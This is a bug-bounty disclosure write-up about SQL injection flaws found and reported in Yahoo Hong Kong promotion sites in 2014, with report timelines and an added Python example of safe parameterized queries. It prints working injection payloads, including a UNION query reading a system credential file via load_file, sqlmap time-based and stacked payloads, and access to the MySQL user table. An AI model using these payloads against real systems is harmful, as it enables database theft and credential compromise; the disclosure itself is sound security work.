Yahoo SQL Injection!

Hello everyone,

After my LFI and RCE reports I decided to focus on another type of attack. After reading Jordan Milne’s report on HK promotions, where he pointed out “It’s a good place to look because it has lots of PHP scripts and Flash, it looks like it wasn’t done by Yahoo’s core devs, and most auditors aren’t looking there since its content is mostly in Chinese”. Indeed! So I decided to expand on these domains, started to poke around the following URL, and was able to make 5 different reports with 8 vulnerable files.

Emotive2012

hk.promotions.yahoo.com/emotive2012/hkdesignyear/pplchoice_gallerydetails.html?i=123

I realized that the ‘i’ parameter with the value 124-1 was still showing the content of value 123. So with a sample “132+ORDER+BY+4” I was able to guess the table numbers on the first try and simply get the following information:

Version&DB

Now I wanted to see if I had the capability to do more, so first I decided to try to load /etc/passwd by doing the following:

hk.promotions.yahoo.com/emotive2012/hkdesignyear/pplchoice_gallerydetails.html?i=-123+UNION+SELECT+1,2,load_file(CHAR(46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 101, 116, 99, 47, 115, 104, 97, 100, 111, 119)),4

But no luck there. However, I was able to access the MySQL database and its tables, including mysql.user:

YahooRoot

The root password wasn’t crackable, BUT I was able to find a user with similar privileges whose password was easily cracked in a few moments (also mentioned in my report on HackerOne to Yahoo to change the passwords).

Timeline:
03/10/2014 – Initial Report
03/14/2014 – Triaged
04/07/2014 – Fixed
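
The arithmetic tell used above (a parameter of 124-1 returning the record for 123) is a sign that the value is concatenated straight into the query. The following is an added example, not code from the original post or from the Yahoo scripts: it reproduces that behaviour against an in-memory SQLite table with constructed rows, shows the parameterized alternative that rejects the same input, and turns the tell into a regression check a defender can run against either handler.

```python
import sqlite3

# Constructed sample rows standing in for the gallery table behind the page
ROWS = [(123, "Entry 123"), (124, "Entry 124")]


def make_db():
    """Build an in-memory table (SQLite here in place of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gallery (i INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO gallery VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, i):
    """Query built by string concatenation: '124-1' is evaluated by the DB."""
    row = conn.execute(f"SELECT title FROM gallery WHERE i = {i}").fetchone()
    return row[0] if row else None


def lookup_safe(conn, i):
    """Validate the parameter as an integer, then bind it; '124-1' is rejected."""
    try:
        i_int = int(i)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT title FROM gallery WHERE i = ?", (i_int,)).fetchone()
    return row[0] if row else None


def arithmetic_probe(lookup, conn, value=124):
    """Return True if the handler evaluates arithmetic in the parameter,
    i.e. '124-1' yields the same record as '123' (the tell from the post)."""
    baseline = lookup(conn, str(value - 1))
    if baseline is None:
        return False  # no record to compare against; inconclusive
    return lookup(conn, f"{value}-1") == baseline


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks arithmetic:", arithmetic_probe(lookup_vulnerable, db))
    print("parameterized handler leaks arithmetic:", arithmetic_probe(lookup_safe, db))
```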

Nikon Photo Itinerary

I was also able to report a few more SQLis on the following domains:

http://hk.promotions.yahoo.com/travel/nikon_photoitinerary/view_albumDetails.html?album=123

dbanduser

Timeline:
03/12/2014 – Initial Report
03/14/2014 – Triaged
04/06/2014 – Fixed

After reading a few source files and analyzing the website more, I came across the following file in the same folder, which was also vulnerable to the same attack.

/ajax/idv_data.php?album_id=SQL INJECTION

The above databases contained information such as user email addresses, postal addresses, phone numbers, etc., but no actual data was dumped from the databases.

Timeline:
03/15/2014 – Initial Report
03/20/2014 – Triaged
04/06/2014 – Fixed

Out of Scope SQL Injections

As for the remaining 2 vulnerable files (which were out of scope but reported anyway): I reported an SQLi via the POST method, for which I was able to produce a valid PoC via sqlmap using the following payload:

Place: POST
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cid=2396 AND 6238=6238

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=2396 AND SLEEP(5)

It’s still in the process of being patched (so I will not be disclosing the URL publicly). The last SQLi, which is out of scope and was initially my first SQLi report to Yahoo, consists of 3 different vulnerable files:

http://hk.promotion.yahoo.net/education/api/get_video_poll.php?poll_id=9805

Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: poll_id=9805 UNION ALL SELECT NULL,CONCAT(0x716d627571,0x596e52534e4d61795843,0x71796a7171),NULL,NULL,NULL,NULL,NULL,NULL#

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: poll_id=9805; SELECT SLEEP(5)--

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: poll_id=9805 AND SLEEP(5)

http://hk.promotion.yahoo.net/education/api/get_video_poll_choice.php?poll_id=9805

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: poll_id=9805 AND SLEEP(10)

http://hk.promotion.yahoo.net/education/api/get_video_poll_result.php?poll_id=9805

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: poll_id=9805 AND SLEEP(10)

Timeline:
03/04/2014 – Initial Report
03/05/2014 – Triaged
03/15/2014 – Fixed

I was way too excited to report this vulnerability, therefore I didn’t bother to see if I could do more than just SLEEP(10) and didn’t try to explore more options such as accessing mysql.user or using the read_file function.
Maybe next time!

Conclusion:

As a result of these SQL injections I was able to place myself in Yahoo’s top 5 “hackers” on HackerOne!
top
I would like to thank Stefano Vettorazzi for pointing out one of my mistakes while I was stuck and trying to exploit one of the above SQLi’s.

Thanks for reading!
